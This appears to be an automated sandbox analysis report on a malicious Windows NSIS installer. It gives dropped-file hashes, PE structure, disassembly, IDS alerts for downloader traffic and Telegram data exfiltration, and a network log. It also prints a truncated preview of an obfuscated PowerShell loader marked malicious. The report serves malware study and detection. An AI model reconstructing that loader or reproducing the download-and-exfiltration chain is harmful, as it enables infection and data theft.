                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,..................Rich...........PE..L...[..V...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..L.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\r5yYt97sfB.exe
                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (4143), with CRLF, LF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):73349
                                                                                                                                            Entropy (8bit):5.192358935913517
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:S8huwQMWGQrfaaLDx6ojsbC3OdUeR4PR50Chr25SQXegbJcLp:S8huwQMKbaavNjswOdUpJ5XhqSQB2p
                                                                                                                                            MD5:0BC26F780285CC594B4223505DC6435B
                                                                                                                                            SHA1:04907D370431440A307277DCE105215F43600157
                                                                                                                                            SHA-256:4D22C8FCC501F0637F1AF1F573FA2EF20F0199EAC74A547D7D887040A6D73454
                                                                                                                                            SHA-512:C5D6CC92B27C554B411253AD3871078307D64B9DB6827AC6D98AE2CCA5215A6636EDC64E15A607FF7FAD53468E48302FF73D0CA71E6E13D3F453BCFF6533D741
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:$Endenizen=$Tilfredsstillendes;........$Wait = @'.Skilred. skaret$Dratt nSKlapt euFunk ioeUnd,rkud BylteriAnnekten,udiciagHyochol1Udsmykk2Gearc,s8Hyper o=Letvgts$JasperiNSprogrgoAdressen MundincIldgernaUdtryk,lProlamic baconsu Calvinl Termina UlvemobUrinstilmetacaryB.worria Contrat MellemhF rfaldy,ebudersSuperexoG nuflep ematosh F,uepai Nonumbcdeutero;Outblot.StatshufCovilleu Ddvg enHyttefacCo,ebistRomboidi Stik ioOadalfrnForskn. UnpowdeUTilskrefFnblgnirprodukteGu vesadU.ilbrleAssembll DorteriKa,sejlgconsummhT.ngsleeLoinclod.rthrods eacan floatpl(Bsninge$T achodsAntimonvEnspndeeStvkonsjInbreattProdukts,roheime Erot srDouci enortho resarrowk,Jernfor$Salv biNUncompaoFraternnDomptrecAfhringaStumpvilLogicizcKontingu Immelol Fj rkra Loser b.hrombolSolerneyBahutuc)Ge,nemf skaerme{Mycetes.Branden.Metepas$ DelmetRTilga geKonkurrgB anddri rkstrsBeryl itLite arrWreckyceI dleverS agpriiMejslednprecompgu ffrozeSinuousn Geo gi Epilogu(RekommaSReproaceMinimump Rec.rctEftersgi unisexfBane.sda Unre
                                                                                                                                            Process:C:\Users\user\Desktop\r5yYt97sfB.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2387610
                                                                                                                                            Entropy (8bit):0.15942566220329682
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:wzAcmELvlCt64oADSmhDEZNe508HYwhsi6zgTmx5upMjAthZFH/Jd3gmXTQu5Y+U:
                                                                                                                                            MD5:87E50D263F04628637C01FDD66A8F091
                                                                                                                                            SHA1:C6B097FD62805352C893727A5EDA4BEEDE2E413C
                                                                                                                                            SHA-256:F59F52215B994807B8ECBB7804CA1C8B4214A8BAAA2DD465E49080B695410842
                                                                                                                                            SHA-512:3E0BF1BDFEBFF9C29E0C82B0E37EBEC4FE6D94954391658F6CD95E485B76AA7E6FAE87CB70E809684B060A5C966855EE9EB4E8EEB6F178A23BA1E5B69F7954F7
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.....................................................................................................................................................&................................................................................................................................................................................................................................................#.....................................................................................................................................A..........................................................1.............................................................................'.................................................................u..................................................................................................................................................................................................................................................%.............................
                                                                                                                                            Process:C:\Users\user\Desktop\r5yYt97sfB.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2802123
                                                                                                                                            Entropy (8bit):0.16014721035839247
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:RaE9710bnra8qiClzbvAx57Ano7sKqOSTiTSqBoChrYB6j2QwGcklvNWuxDgQ4uv:C
                                                                                                                                            MD5:A7D919B312C1C74AB4C35A522D946B77
                                                                                                                                            SHA1:80DBDC65B19CFB6CBE8AECFA41D28F450857DCC5
                                                                                                                                            SHA-256:09C869BFBB2A5B7CC84D9E0F56C4F9FA728E1F23C2415DDC0E74FC3D39AA6154
                                                                                                                                            SHA-512:389824FE2C76C6C2204A56ACC7A160D133279B1C0C1F4A0635DA9351C4D82661D31DF2C536DC2A238F040A23AED46ADDD62657350EDFBA6820869B5B9C0473A5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.............................................................w............................................................................................................................................................................................7..........................................................................................................................................................................^......................................................................................................................................................................................................r....................d..............................................................................................................................v.......................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\r5yYt97sfB.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):398
                                                                                                                                            Entropy (8bit):4.246758482060977
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:oqMiL/AZwy9A2YYut9HLv4CDGcL+iEnHE9DChVgwCtMWIX0FWWAz6CJArAkyVMIb:vMiL/RDttZPDpL0nHlVg1tXqMWjhb
                                                                                                                                            MD5:A01CF8B2F34D6F8D6A6067AD87AD420F
                                                                                                                                            SHA1:C49BFD81A1418697165CB62EDBEEF5E8D47157BA
                                                                                                                                            SHA-256:A85ACBE8F4FAD0CA373D1BC143633962C89D69E1503A3C310E283DA4EF97B4D7
                                                                                                                                            SHA-512:B4784A1754ABE449C17A5B88E2D4ECA4D0B9A80E5A20416B80CAAF8989FAB9A6BABCD711691D91246C9B1F12BA7C01FD00450AF247AB4E4B64174E79466636D9
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:huskers kvierne workingman.maanedsmagasinerne patriotical torpederinger baromacrometer tubful synchronousness logeion syvendelenes cadere spasmolysis..djvlekultens conscripting nebulium snary streamerbaand balfaldaras nonbeatific unwitless diplomate..ressagernes indifferensen inositols saltningen flimsiness.fusioneringen papists taknemlighedglds transpirering,lkagernes frokostmders farthingdeal.
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):789552
                                                                                                                                            Entropy (8bit):7.955898424452735
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12288:6DGZKmormA1VThZChbBUsfycFOzZ85VEuC4pJBFN167jo0WrAvgCTBIK4nzDiV:4mor/1xhZChlVfyPOJC4pzFTIMLrq8O
                                                                                                                                            MD5:831A8A58088361D324C958970B8ED79C
                                                                                                                                            SHA1:13366BEFE0AF1EBB0665C81209DCAB3388257CF0
                                                                                                                                            SHA-256:88A5FA91E12BE14E5E37A237DA70392DD9218F29AD88FA2CFF8693AB4E215E81
                                                                                                                                            SHA-512:A52F7D06CC421CFB6450C9C747C27B30342FA74EB9809B38BE22191A999985FE248EE600490C37E7D291E2ADDC71F8A922033ED934EE762DFDA6012C1F1C531A
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..NP..*_...P..s...P...V...P..Rich.P..........................PE..L...y..V.................b...*.......3............@..................................9....@......................................................... ................................................................................................text...^a.......b.................. ..`.rdata..p............f..............@..@.data...X............z..............@....ndata...@...............................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):26
                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                            Process:C:\Users\user\Desktop\r5yYt97sfB.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5161744
                                                                                                                                            Entropy (8bit):0.15808018941602964
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:T+W5rfWR61urINGFhHyjTYYfH8tfhDPzQnR64u4EMMHPdu6izJlM/j2ZGoDuTmnj:moVSf
                                                                                                                                            MD5:862F3B806ED8EE61690B5CB807E4039F
                                                                                                                                            SHA1:63579479347755219148DB8926C9FAE8FF3456A4
                                                                                                                                            SHA-256:B8664ACCEAFF8EDC30B830CCEE20BF79BAC7D003169E8BD7A4C7FB025BBC83A7
                                                                                                                                            SHA-512:64B1617EB008A3496732D5737F2602F47796B6342DE64498BB93E1A3D94487FA1167DD008400FD19C46DF013FD6C211420AF4C33A9BAC3E15D13C5BE5984430B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................e.....................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\r5yYt97sfB.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):342113
                                                                                                                                            Entropy (8bit):7.624220977626349
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:0zT5SVPysGciOPcyrda3NTzdv1AroxPhOTP6fZmgnkf0zdVCttlcgB:0zVSlYOUMa3NTzdv1AroxQMZU03CmgB
                                                                                                                                            MD5:9B013D587817D4C397B180ADC2BDA56B
                                                                                                                                            SHA1:9C5DE096F004A8DB3AB5A6731BDB96F4E3881DC1
                                                                                                                                            SHA-256:284DD260B9FD9141E8F787C720E453278B1BB8DFF1A655E158A16264B3EA7996
                                                                                                                                            SHA-512:19DEC58786E694C613B7EE237B2D983727750201EFDEA0D0988E88F1C53B4EE95C6DE27DAF824C7CC5BB972EED504D4F1D0B0E2E121842B4EA2160C8959CF9ED
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.............................W...............^^...............8.....AA....t..E...88.1........KKKK.............""..<.VVV...........]..........}}..................Q.***.....7.............................*...............gg.x...........................1............X.nnnnnnn.....k........z....BB......xxx...........GGGG...ddd.................NN..j.......jj........................\\.............777...F...FFFFF.........````....88..............kkkk.......@@.CC..........@.......``.................2...;........N..t..???.....B....................................................K............oo............>>>.$$..............................f.......................................I.q....]]........................q...............===...........LL........|.##.WW.........z.222............................................./..v...........OO........................V.G.........@.oo........................................b.......}}..........d..........................{.......|........./..............Q.vv.....
                                                                                                                                            Process:C:\Users\user\Desktop\r5yYt97sfB.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):33
                                                                                                                                            Entropy (8bit):4.187889194919351
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:bovixgS7v4M2L:TgS7gZL
                                                                                                                                            MD5:E23F52386361095BDB7040B09E2216AE
                                                                                                                                            SHA1:91F31DD82AB80140DB621B6DCE0B9B5D6B568723
                                                                                                                                            SHA-256:36467321184A76E0FEA592D2896856A37EC18FC8480DE66F05D719D93B39D070
                                                                                                                                            SHA-512:19D18DE54B3466F0D283271786B3B308C3BE07F21174C46563C4C16292716C52F2C1B85F416ED77143EA6847BFC4C4C37F22296948EAC47499276B181F129B9C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:[gap]..predespond=fascinatingly..
                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                            Entropy (8bit):7.955898424452735
                                                                                                                                            TrID:
                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                            File name:r5yYt97sfB.exe
                                                                                                                                            File size:789'552 bytes
                                                                                                                                            MD5:831a8a58088361d324c958970b8ed79c
                                                                                                                                            SHA1:13366befe0af1ebb0665c81209dcab3388257cf0
                                                                                                                                            SHA256:88a5fa91e12be14e5e37a237da70392dd9218f29ad88fa2cff8693ab4e215e81
                                                                                                                                            SHA512:a52f7d06cc421cfb6450c9c747c27b30342fa74eb9809b38be22191a999985fe248ee600490c37e7d291e2addc71f8a922033ed934ee762dfda6012c1f1c531a
                                                                                                                                            SSDEEP:12288:6DGZKmormA1VThZChbBUsfycFOzZ85VEuC4pJBFN167jo0WrAvgCTBIK4nzDiV:4mor/1xhZChlVfyPOJC4pzFTIMLrq8O
                                                                                                                                            TLSH:9EF422682799CC73C5719AB0D8261FFADA365EA3D93CC75B66103C5E30363834A2D7A1
                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..NP..*_...P...s...P...V...P..Rich.P..........................PE..L...y..V.................b...*.....
                                                                                                                                            Icon Hash:070b4d61782c178f
                                                                                                                                            Entrypoint:0x4033b6
                                                                                                                                            Entrypoint Section:.text
                                                                                                                                            Digitally signed:true
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            Subsystem:windows gui
                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                            Time Stamp:0x567F8479 [Sun Dec 27 06:26:01 2015 UTC]
                                                                                                                                            TLS Callbacks:
                                                                                                                                            CLR (.Net) Version:
                                                                                                                                            OS Version Major:4
                                                                                                                                            OS Version Minor:0
                                                                                                                                            File Version Major:4
                                                                                                                                            File Version Minor:0
                                                                                                                                            Subsystem Version Major:4
                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                            Import Hash:7192d3773f389d45ebac3cc67d054a8a
                                                                                                                                            Signature Valid:false
                                                                                                                                            Signature Issuer:CN=Monotony, E=Grosbeak@Tryglerierne10.Bru, O=Monotony, L=Regoul, OU="Skrivelser Hindring ", S=Scotland, C=GB
                                                                                                                                            Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                            Error Number:-2146762487
                                                                                                                                            Not Before, Not After
                                                                                                                                            • 17/08/2024 05:50:42 17/08/2025 05:50:42
                                                                                                                                            Subject Chain
                                                                                                                                            • CN=Monotony, E=Grosbeak@Tryglerierne10.Bru, O=Monotony, L=Regoul, OU="Skrivelser Hindring ", S=Scotland, C=GB
                                                                                                                                            Version:3
                                                                                                                                            Thumbprint MD5:CB69F52AF42E1C4B70D0C8F8F90169F5
                                                                                                                                            Thumbprint SHA-1:22D29C53193D917BBDFC7BE6A75253480C50256F
                                                                                                                                            Thumbprint SHA-256:3E0CFEBDEAA4F6F4022C548F42E640595E85CADDAE8DC4CE018663F463F5B5D2
                                                                                                                                            Serial:0410CCB3C63FA71DD0DB1D82B6E33161347CBE41
                                                                                                                                            Instruction
                                                                                                                                            sub esp, 000002D4h
                                                                                                                                            push ebp
                                                                                                                                            push esi
                                                                                                                                            push 00000020h
                                                                                                                                            xor ebp, ebp
                                                                                                                                            pop esi
                                                                                                                                            mov dword ptr [esp+0Ch], ebp
                                                                                                                                            push 00008001h
                                                                                                                                            mov dword ptr [esp+0Ch], 0040A230h
                                                                                                                                            mov dword ptr [esp+18h], ebp
                                                                                                                                            call dword ptr [004080B4h]
                                                                                                                                            call dword ptr [004080B0h]
                                                                                                                                            cmp ax, 00000006h
                                                                                                                                            je 00007F0C0CD8B3E3h
                                                                                                                                            push ebp
                                                                                                                                            call 00007F0C0CD8E53Eh
                                                                                                                                            cmp eax, ebp
                                                                                                                                            je 00007F0C0CD8B3D9h
                                                                                                                                            push 00000C00h
                                                                                                                                            call eax
                                                                                                                                            push ebx
                                                                                                                                            push edi
                                                                                                                                            push 0040A3B0h
                                                                                                                                            call 00007F0C0CD8E4BBh
                                                                                                                                            push 0040A3A8h
                                                                                                                                            call 00007F0C0CD8E4B1h
                                                                                                                                            push 0040A39Ch
                                                                                                                                            call 00007F0C0CD8E4A7h
                                                                                                                                            push 00000009h
                                                                                                                                            call 00007F0C0CD8E50Ch
                                                                                                                                            push 00000007h
                                                                                                                                            call 00007F0C0CD8E505h
                                                                                                                                            mov dword ptr [0042A264h], eax
                                                                                                                                            call dword ptr [00408044h]
                                                                                                                                            push ebp
                                                                                                                                            call dword ptr [004082A8h]
                                                                                                                                            mov dword ptr [0042A318h], eax
                                                                                                                                            push ebp
                                                                                                                                            lea eax, dword ptr [esp+34h]
                                                                                                                                            push 000002B4h
                                                                                                                                            push eax
                                                                                                                                            push ebp
                                                                                                                                            push 00421708h
                                                                                                                                            call dword ptr [0040818Ch]
                                                                                                                                            push 0040A384h
                                                                                                                                            push 00429260h
                                                                                                                                            call 00007F0C0CD8E0F2h
                                                                                                                                            call dword ptr [004080ACh]
                                                                                                                                            mov ebx, 00435000h
                                                                                                                                            push eax
                                                                                                                                            push ebx
                                                                                                                                            call 00007F0C0CD8E0E0h
                                                                                                                                            push ebp
                                                                                                                                            call dword ptr [00408178h]
                                                                                                                                            Programming Language:
                                                                                                                                            • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x84bc0xa0.rdata
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x4f0000x1c5c8.rsrc
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0xc05200x710
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b8.rdata
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                            .text0x10000x615e0x620041c79e199a2175acbe73d4712982d296False0.6625876913265306data6.4557374109402IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                            .rdata0x80000x13700x14009cbedf8ff452ddf88e3b9cf6f80372a9False0.4404296875data5.102148788391081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                            .data0xa0000x203580x60073e3da5d6c2dd1bec8a02d238a90e209False0.5149739583333334data4.09485328769633IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            .ndata0x2b0000x240000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            .rsrc0x4f0000x1c5c80x1c6000e60bf3ace34d6a7de54772dad04b786False0.8734684746696035data7.577852317524115IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                            RT_ICON0x4f4180xc9c0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9973280669144982
                                                                                                                                            RT_ICON0x5bdd80x5d9cPNG image data, 256 x 256, 8-bit colormap, non-interlacedEnglishUnited States0.9926556501418795
                                                                                                                                            RT_ICON0x61b780x2e8ePNG image data, 256 x 256, 4-bit colormap, non-interlacedEnglishUnited States0.9979023326061419
                                                                                                                                            RT_ICON0x64a080x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4182572614107884
                                                                                                                                            RT_ICON0x66fb00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.45075046904315197
                                                                                                                                            RT_ICON0x680580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304EnglishUnited States0.6625799573560768
                                                                                                                                            RT_ICON0x68f000x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024EnglishUnited States0.7382671480144405
                                                                                                                                            RT_ICON0x697a80x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.6317073170731707
                                                                                                                                            RT_ICON0x69e100x568Device independent bitmap graphic, 16 x 32 x 8, image size 256EnglishUnited States0.5505780346820809
                                                                                                                                            RT_ICON0x6a3780x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6187943262411347
                                                                                                                                            RT_ICON0x6a7e00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.7002688172043011
                                                                                                                                            RT_ICON0x6aac80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.8074324324324325
                                                                                                                                            RT_DIALOG0x6abf00x100dataEnglishUnited States0.5234375
                                                                                                                                            RT_DIALOG0x6acf00x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                            RT_DIALOG0x6ae100xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                            RT_DIALOG0x6aed80x60dataEnglishUnited States0.7291666666666666
                                                                                                                                            RT_GROUP_ICON0x6af380xaedataEnglishUnited States0.6379310344827587
                                                                                                                                            RT_VERSION0x6afe80x29cdataEnglishUnited States0.5089820359281437
                                                                                                                                            RT_MANIFEST0x6b2880x33fXML 1.0 document, ASCII text, with very long lines (831), with no line terminatorsEnglishUnited States0.5547533092659447
                                                                                                                                            DLLImport
                                                                                                                                            KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, CreateFileW, GetFileSize, MoveFileW, SetFileAttributesW, GetModuleFileNameW, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, GetCurrentProcess, CompareFileTime, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, LoadLibraryW, GetProcAddress, GetModuleHandleA, ExpandEnvironmentStringsW, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, GlobalFree, lstrcmpW, GlobalAlloc, WaitForSingleObject, GetDiskFreeSpaceW, lstrcpynW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                                                            USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow
                                                                                                                                            GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                            SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                                                                            ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                                            COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                                            ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                            EnglishUnited States
                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                            2025-01-10T17:17:26.605893+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.759370216.58.206.46443TCP
                                                                                                                                            2025-01-10T17:17:31.679110+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.759372132.226.8.16980TCP
                                                                                                                                            2025-01-10T17:17:32.976159+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.759372132.226.8.16980TCP
                                                                                                                                            2025-01-10T17:17:33.553402+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.759374104.21.80.1443TCP
                                                                                                                                            2025-01-10T17:17:34.444924+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.759375132.226.8.16980TCP
                                                                                                                                            2025-01-10T17:17:36.573806+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.759378104.21.80.1443TCP
                                                                                                                                            2025-01-10T17:17:40.018419+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.759382104.21.80.1443TCP
                                                                                                                                            2025-01-10T17:17:42.933167+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.759386104.21.80.1443TCP
                                                                                                                                            2025-01-10T17:17:45.508646+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.759389149.154.167.220443TCP
                                                                                                                                            2025-01-10T17:17:52.314903+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.759390149.154.167.220443TCP
                                                                                                                                            2025-01-10T17:17:54.940923+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.759391149.154.167.220443TCP
                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Jan 10, 2025 17:15:54.951447964 CET5930853192.168.2.7162.159.36.2
                                                                                                                                            Jan 10, 2025 17:15:54.956250906 CET5359308162.159.36.2192.168.2.7
                                                                                                                                            Jan 10, 2025 17:15:54.956307888 CET5930853192.168.2.7162.159.36.2
                                                                                                                                            Jan 10, 2025 17:15:54.961558104 CET5359308162.159.36.2192.168.2.7
                                                                                                                                            Jan 10, 2025 17:15:55.409893990 CET5930853192.168.2.7162.159.36.2
                                                                                                                                            Jan 10, 2025 17:15:55.415460110 CET5359308162.159.36.2192.168.2.7
                                                                                                                                            Jan 10, 2025 17:15:55.415580034 CET5930853192.168.2.7162.159.36.2
                                                                                                                                            Jan 10, 2025 17:17:25.523911953 CET59370443192.168.2.7216.58.206.46
                                                                                                                                            Jan 10, 2025 17:17:25.523938894 CET44359370216.58.206.46192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:25.524055004 CET59370443192.168.2.7216.58.206.46
                                                                                                                                            Jan 10, 2025 17:17:25.545586109 CET59370443192.168.2.7216.58.206.46
                                                                                                                                            Jan 10, 2025 17:17:25.545604944 CET44359370216.58.206.46192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:26.191349030 CET44359370216.58.206.46192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:26.191478968 CET59370443192.168.2.7216.58.206.46
                                                                                                                                            Jan 10, 2025 17:17:26.192442894 CET44359370216.58.206.46192.168.2.7
                                                                                                                                            Jan 10, 2025 17:17:26.192528009 CET59370443192.168.2.7216.58.206.46
